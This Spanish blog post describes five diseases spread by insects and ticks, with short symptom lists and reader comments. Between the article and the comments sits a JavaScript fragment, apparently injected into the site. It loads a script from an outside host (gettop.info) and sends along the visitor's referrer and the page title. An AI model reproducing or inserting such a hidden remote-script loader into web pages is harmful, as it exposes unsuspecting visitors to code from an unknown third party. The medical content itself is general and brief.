Salud y belleza » Enfermedades, Salud

Cinco enfermedades que transmiten los insectos

3 Comentarios

Pensamos que las ratas son el único ser vivo capaz de transmitir muchas enfermedades pero a menudo olvidamos que los insectos también son muy peligrosos, aunque sean tan pequeños, y que pueden transmitir enfermedades muy peligrosas, sobre todo si en tu caso vas a viajar fuera de tu país, así que te desvelamos algunas de esas enfermedades para que tomes precauciones cuando viajes al extranjero y te protejas de los insectos.

enfermedades-insectos

- Lyme: es una enfermedad que transmiten las garrapatas y que en función de cuándo se detecte es más o menos peligrosa. Algunos de sus síntomas son el color rojo de la piel que se va extendiendo desde la picadura. También puede producirse artritis, dolor de cabeza, parálisis de los músculos faciales, dolor de cabeza…

lyme

- Dengue: esta enfermedad la transmiten unos mosquitos llamados aedes aegyptis y provoca síntomas que pueden confundirse con un estado gripal. Algunos síntomas algo más graves son la fiebre hemorrágica, shock encefalitis o muerte.

dengue

- Malaria: es una enfermedad que pueden contagiar los mosquitos Anopheles y se transmite además de persona a persona por aguja infectada o por picadura de mosquito. Algunos de sus síntomas son escalofríos y fiebre.

malaria-mosquito

- Fiebre Amarilla: puede haber fiebre amarilla en la ciudad y en la selva. Algunos de los síntomas más comunes son la fiebre, dolor de cabeza, náuseas, vómitos, dolor muscular e ictericia.

fiebre-amarilla-vacuna

- Tifus: esta enfermedad es muy común en sitios donde se suele acumular basura y suciedad. Se contagia por picaduras de pulgas, además de por ratas infectadas. Algunos de sus síntomas son dolor abdominal, erupciones en la piel, fiebre alta, tos, dolor de músculos y articulaciones, vómitos y náuseas…

tifus

Lo mejor para prevenir todas estas enfermedades transmitidas por insectos es estar bien informados y seguir las indicaciones de salud de cada país.

¿Alguna vez has tenido una de estas enfermedades transmitidas por insectos?

if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

3 Comments »

  • olivia said:

    lo de la garrapata es más común en España que el resto, por lo menos por la zona de campo y tal.

  • josua said:

    una vez fui de viaja a sudáfrica y el médico me mandó a que me pusieran varias inyecciones. no era nada agradable pero la verdad es que era necesario porque allí a lo mejor no tienen los medios para paliar los síntomas que se necesitan y aquí puedes prevenirlo mejor.

  • illo said:

    muy buena la info!

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.